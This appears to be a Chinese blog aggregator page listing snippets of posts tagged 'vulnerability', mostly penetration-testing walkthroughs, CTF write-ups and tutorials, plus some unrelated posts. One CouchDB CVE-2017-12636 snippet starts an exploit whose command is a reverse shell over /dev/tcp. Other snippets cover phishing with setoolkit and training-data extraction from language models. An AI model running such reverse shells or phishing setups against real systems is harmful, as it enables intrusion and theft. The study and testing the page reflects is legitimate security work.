漏洞信息收集

常见的漏洞利用框架整理

一、常见的漏洞利用框架MetasploitFramework:一个广泛使用的开源漏洞利用框架,用于测试和评估系统的安全性。ExploitDB:一个在线漏洞利用数据库,包含各种漏洞的利用代码。
程序员_大白·2024-01-03 01:27

使用webcruiser扫描网站漏洞及防御

Webcruiser是一款英文版的漏洞扫描工具,体积小,支持多种漏洞扫描,扫描到漏洞的同时可以直接对漏洞进行验证测试。
程序员_大白·2024-01-03 01:27

SRC漏洞挖掘经验分享

文件解析造成的XXE网站存在一个有意思的功能点,通过上传Excel会将内容显示在页面上,也就是说后端会解析ExcelExcel是通过XML来存储数据的,也就是说网站解析了XML,那么我们就可以在XML中注入语句来尝试攻击新建一个"新建MicrosoftExcel工作表.xlsx",将后缀改为.zip并解压尝试在"[Content_Types].xml"中注入语句,之后再压缩回.zip然后重命名为"
Python_chichi·2024-01-03 01:56

靶场实战TOP漏洞

一个商城靶场挖掘多种漏洞有如下漏洞信息泄露支付漏洞csrf修改用户密码文件上传getshell漏洞注入越权目标遍历任意文件下载后台弱口令`黑客&网络安全如何学习今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们
Python_chichi·2024-01-03 01:55

网络安全入门教程(非常详细)从零基础入门到精通,看完这一篇就够了。

有时多google,baidu,我们往往都遇不到好心的大神,谁会无聊天天给你做解答.4.遇到实在搞不懂的,可以先放放,以后再来解决.基本方向:1.web安全方面(指网站服务器安全方面,进行渗透测试,检测漏洞以及安全性
Python_chichi·2024-01-03 01:25

ctf-wiki之ret2libc

通常选择执行system("/bin/sh")查看保护开启了栈不可执行保护程序放进IDA中查看明显的栈溢出漏洞发现system函数但缺少/bin/sh所以利用ROPgadget查找/bin/sh地址找到
hope_9382·2024-01-03 00:51

红队攻防实战之DC1

如果额头终将刻上皱纹,你只能做到,不让皱纹刻在你的心上0x01信息收集:1.1端口探测使用nmap工具端口扫描结果如下:由nmap扫描可以知道,目标开放了22,80,111,46204端口,看到端口号22
儒道易行·2024-01-02 23:20

红队攻防实战之DC2

吾愿效法古圣先贤,使成千上万的巧儿都能在21世纪的中华盛世里,丰衣足食,怡然自得0x01信息收集:1.1端口探测使用nmap工具可以发现开放了80端口,网页服务器但是可以看出做了域名解析,所以需要在本地完成本地域名解析
儒道易行·2024-01-02 23:19

一、网络安全渗透测试的相关理论和工具

雷·布雷斯林以罪犯的身份进入监狱,寻找监狱的漏洞。而他的每一次成功越狱,就代表着他已经找出了这个监狱安全方面的漏洞。当然雷·布雷斯林的目的并不是
InfI1traTe.·2024-01-02 22:31

软件测试的风险主要表现在哪些方面

未能发现重要缺陷风险在测试过程中未能发现软件中的重要缺陷可能会对产品的质量和可靠性造成不利影响,如用户体验不良、功能不完整、安全漏洞等问题。
泽众云测试·2024-01-02 22:40

复课

在这期间,不断发信息收集各种数据。中午躺了半个小时就回校了。由于本人或有同居住者健康码曾经变成黄
我不是小仙女·2024-01-02 21:14

《工具录》NetCat

工具录1:NetCat2:选项介绍3:示例3.1:正向连接(被动连接)3.2:反向连接(主动连接)3.3:信息收集3.4:文件传输4:其他本文以kali-linux-2023.3-vmware-amd64
永别了,赛艾斯滴恩·2024-01-02 21:15

【Hack The Box】Linux练习-- Seventeen

文章目录HTB学习笔记信息收集80目录爆破8000目录爆破域名爆破exam.seventeen.htb对这个域名目录爆破已知cms利用sql注入sqlmap利用新的域名文件上传www->mattka
人间体佐菲·2024-01-02 21:14

【Hack The Box】windows练习-- love

文章目录HTB学习笔记信息收集我看445smb我看3306我看5080,7680我看https我看5000web我看80web看http://staging.love.htb/再次利用rce提权信息收集
人间体佐菲·2024-01-02 21:44

HackTheBox - Medium - Linux - Investigation

服务器利用ExifTool实用程序来分析图像,但是,正在使用的版本存在命令注入漏洞,可利用该漏洞以用户“www-data”的身份在盒子上获得初始立足点。
Sugobet·2024-01-02 21:44

HackTheBox - Medium - Linux - Bagel

然后,该漏洞用于下载“.NET”WebSocket服务器,该服务器一旦反汇编就会显示纯文本凭据。进一步的分析揭示了一
Sugobet·2024-01-02 21:43

HackTheBox - Medium - Linux - Interface

外部信息收集端口扫描循例nmapWeb枚举在响应头中,能看
Sugobet·2024-01-02 21:43

csrf漏洞修复

漏洞说明:通过篡改请求头中的Referer值依旧能够访问到接口。
郭优秀的笔记·2024-01-02 21:42

网络安全怎么入门?按照这个学习方法和路线,小白都能学会。

与此同时,互联网的开放性和安全漏洞带来的风险也无处不在。网络攻击行为日趋复杂;黑客攻击行为组织性更强;针对手机无线终端的网络攻击日趋严重;有关网络攻击和数据泄露的新闻层出不穷,网
代码熬夜敲666·2024-01-02 20:40

面对海量请求,缓存设计还应该考虑哪些问题?

如果某些心怀不轨的人利用这个存在的漏洞去伪
尼小摩·2024-01-02 20:12

漏洞复现】天融信TOPSEC安全管理系统远程命令执行漏洞

文章目录漏洞描述资产测绘漏洞复现漏洞描述`天融信TopSec安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、
新疆东坡肉·2024-01-02 20:26

安全学习入坑指南

举例:企业网安全涉及和部署;省XX局政务网信息安全等级保护改造项目;某厂商防火墙存在远程代码执行漏洞。Web安全:也称为应用安全,围绕网站安全锁延伸出来的Web前后端安全、服务器安全、数
YT--98·2024-01-02 20:25

天融信TOPSEC安全管理系统存在远程命令执行漏洞

文章目录产品简介漏洞概述指纹识别漏洞利用修复建议产品简介天融信TopSec安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警
3tefanie丶zhou·2024-01-02 20:55

搞知识竞赛活动要做哪些准备工作

因此,必须加强筹备阶段的组织领导工作,周密细致地进行策划准备,杜绝任何疏忽和漏洞。特别是要重视筹备工作收尾时的检查验收,发现问题及时纠正和弥补,以
天纵软件·2024-01-02 19:06

77 Python开发-批量Fofa&SRC提取&POC验证

目录本课知识点:学习目的:演示案例:Python开发-某漏洞POC验证批量脚本Python开发-Fofa搜索结果提取采集脚本Python开发-教育SRC报告平台信息提取脚本涉及资源:本课知识点:Request
山兔1·2024-01-02 18:28

2022年中职组“网络安全”赛项湖南省B-3——私钥泄漏

B-3:应用服务漏洞扫描与利用任务环境说明:需要环境有问题可以加q服务器场景:Server15服务器场景操作系统:未知(关闭链接)使用命令nmap探测目标靶机的服务版本信息,将需要使用的参数作为FLAG
er,we,th·2024-01-02 18:58

野蛮人的可恶

他们拿自由做为幌子善于钻营各种法律法规中的漏洞,大打擦边球,玩走钢丝的危险游戏,只是他们的这种自由却是以没有约束为前提的。
遗忘的时空·2024-01-02 18:26

生日宴邢夫人当众指责王熙凤后,贾母要王熙凤捡佛豆儿,大有深意

贾母八十大庆期间,尤氏发现凤姐管理上的一个大漏洞,大观园深更半夜门未关,灯火未熄灭,有大大的安全隐患。
诗绿凤细讲红楼梦·2024-01-02 16:54

2021-04-28

其实微信有一个很大的漏洞,就是以信息不对称为原则的状况下,在保持朋友圈全部可见的基础上,共同好友的微信点赞留痕,就是暴露了自己的人际空间,这一点,非常像《三体》中的黑暗森林法则。
TIMEing·2024-01-02 14:39

EXCEL词典(xllex.dll)文件丢失或损坏的解决方法

管它三七二十几,先“确定”了再说:下面这个就是那个“好家伙”:于是我做了系统修复,并没有找到什么实质性的漏洞,在系统更新中也没有找到错误,此时我有点不开心了,突然生锈的脑子里冒出了一个想法:百度啊!
鹿·先生·2024-01-02 12:19

主流大语言模型集体曝出训练数据泄露漏洞

内容概要:安全研究人员发现,黑客可利用新的数据提取攻击方法从当今主流的大语言模型(包括开源和封闭,对齐和未对齐模型)中大规模提取训练数据。当前绝大多数大语言模型的记忆(训练数据)可被恢复,无论该模型是否进行了所谓的“对齐”。黑客可以通过查询模型来有效提取训练数据,甚至无需事先了解训练数据集。安全研究者展示了如何从Pythia或GPT-Neo等开源语言模型、LLaMA或Falcon等主流半开放模型以
威胁情报收集站·2024-01-02 12:16

全网最详细的手把手模拟实现Cache

博主写这篇文章,主要是以实现CacheSim模拟器为主,目的是对CPU模拟器进行丰富,来研究cpu乱序执行机制与回滚机制带来的meltdown漏洞
Strive_LiJiaLe·2024-01-02 11:57

Couchdb 垂直权限绕过漏洞(CVE-2017-12635)

一、漏洞描述ApacheCouchDB是一个开源数据库,专注于易用性和成为”完全拥抱web的数据库”。
黄公子学安全·2024-01-02 10:51

Couchdb 任意命令执行漏洞(CVE-2017-12636)

一、环境搭建二、访问三、构造payload#!/usr/bin/envpython3importrequestsimportjsonimportbase64fromrequests.authimportHTTPBasicAuthtarget='http://192.168.217.128:5984'#目标ipcommand=rb"""sh-i>&/dev/tcp/192.168.217.128/5
黄公子学安全·2024-01-02 10:51

Adobe ColdFusion 文件读取漏洞(CVE-2010-2861)

漏洞原理AdobeColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusionMarkupLanguage)是针对Web应用的一种程序设计语言。
黄公子学安全·2024-01-02 10:18

红队打靶练习:SAR: 1

目录信息收集1、arp2、netdiscover3、nmap4、nikto5、whatweb小结目录探测1、gobuster2、dirsearchWEBCMS1、cms漏洞探索2、RCE漏洞利用提权getuser.txt
真的学不了一点。。。·2024-01-02 07:40

26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2

文章目录OracleMongoDBsqlmapSQL注入课程体系;数据库注入:access、mysql、mssql、oracle、mongodb、postgresql等数据类型注入:数字型、字符型、搜索型、加密型(base63json)等提交方式注入:get、post、cookie、http头等查询方式注入:查询、增加、删除、更新、堆叠等复杂注入利用:二次注入、dnslog注入、绕过bypass等
PT_silver·2024-01-02 05:55

27、web攻防——通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5

文章目录数字型:0-9。http;//localhost:8081/blog/news.php?id=1字符型:a-z、中文,需要闭合符号。http;//localhost:8081/blog/news.php?id=simple搜索型:在字符型的基础上加入了通配符%。http;//localhost:8081/blog/news.php?id=1在闭合%'时,--+可能失败嗷~编码型:数据以编码
PT_silver·2024-01-02 05:54

DC-1实战手把手教详解

DC-1实战手把手教详解文章目录DC-1实战手把手教详解1、DC-1的简单介绍描述2、实战(1)目标发现(2)信息分析3、漏洞攻击总结1、DC-1的简单介绍靶机下载链接描述DC-1是一个专门建造的易受攻击的实验室
皓月流星·2024-01-02 05:40

《VulnHub》DC:1

1date:2024-01-0112:46:49updated:2024-01-0112:46:50categories:WriteUp:Cyber-Rangeexcerpt:主机发现、目标信息扫描、漏洞扫描
永别了,赛艾斯滴恩·2024-01-02 05:10

2022-5-12晨间日记

至于白天的基本上都在办公室外面什么天气根本就不清楚心情:昨天的心情一般,在南门,si' si cheng cheng纪念日:任务清单昨日完成的任务,最重要的三件事:刘阳工作移交完成,都快遗忘的3份融资合同,尽然莫名的出来了,工作流程上的漏洞
丑石521·2024-01-02 04:16

71内网安全-域横向网络&传输&应用层隧道技术

应用场景四已经获得了一些控制权,但是不能对肉鸡进行信息收集等一些执行功能;比如
上线之叁·2024-01-02 01:31

01读《物联网安全研究综述:威胁、检测与防御》随笔

01读《物联网安全研究综述:威胁、检测与防御》随笔摘要3研究现状3.1安全威胁3.1.1云平台访问控制缺陷3.1.2云平台恶意应用3.1.3云平台实体和应用交互漏洞3.1.4通信协议漏洞3.1.5通信流量侧信道信息泄露
雨兮雨·2024-01-01 23:59

02关于国内外研究团队做物联网的汇总

NLP和程序分析数据隐私二进制分析【团队网站】https://www.xing-luyi.com/二、加州大学尔湾分校智能系统安全实验室【团队主要研究内容】自动驾驶和智能交通系统安全机器学习安全自动化软件漏洞检测无人机的机器人系统安全传感器安智能家居
雨兮雨·2024-01-01 23:59

什么是边缘案例测试?如何查找并确定优先级

通过测试边缘案例,质量保证团队可以通过发送有意的安全攻击来识别漏洞。这种测试还能确保
测试界柠檬·2024-01-01 23:20

使用setoolkit制作钓鱼网站并结合dvwa靶场储存型XSS漏洞利用

setoolkit是一款kali自带的工具使用命令启动setoolkit1)Social-EngineeringAttacks1)社会工程攻击2)PenetrationTesting(Fast-Track)2)渗透测试(快速通道)3)ThirdPartyModules3)第三方模块4)UpdatetheSocial-EngineerToolkit4)更新社会工程师工具包5)UpdateSETcon
Myon⁶·2024-01-01 23:42

一个人在自律上有漏洞,他在生活的方方面面都会出现漏洞

一个人在自律上有漏洞,他在生活的方方面面都会出现漏洞。自律做不好,读书,学习,工作,赚钱都做不好。
宇宽时间管理·2024-01-01 23:49

【Web】Ctfshow Thinkphp5 非强制路由RCE漏洞

目录非强制路由RCE漏洞web579web604web605web606web607-610前面审了一些tp3的sql注入,终于到tp5了,要说tp5那最经典的还得是rce下面介绍非强制路由RCE漏洞非强制路由
Z3r4y·2024-01-01 23:09

datatable Select 关于中文“(”筛选错误

在进行数据导入时进行的数据检查时莫名出现漏洞,反复检查代码并没有发现问题DataRow[]dr教师=DT教师列表.Select(string.Format("姓名='{0}'",姓名));if(dr教师
自在修行·2024-01-01 22:54

常见的漏洞

常见的漏洞:1、敏感信息泄露由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出差导致敏感信息泄露。
德迅云安全-小娜·2024-01-01 22:50
上一页 65 66 67 68 69 70 71 72 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他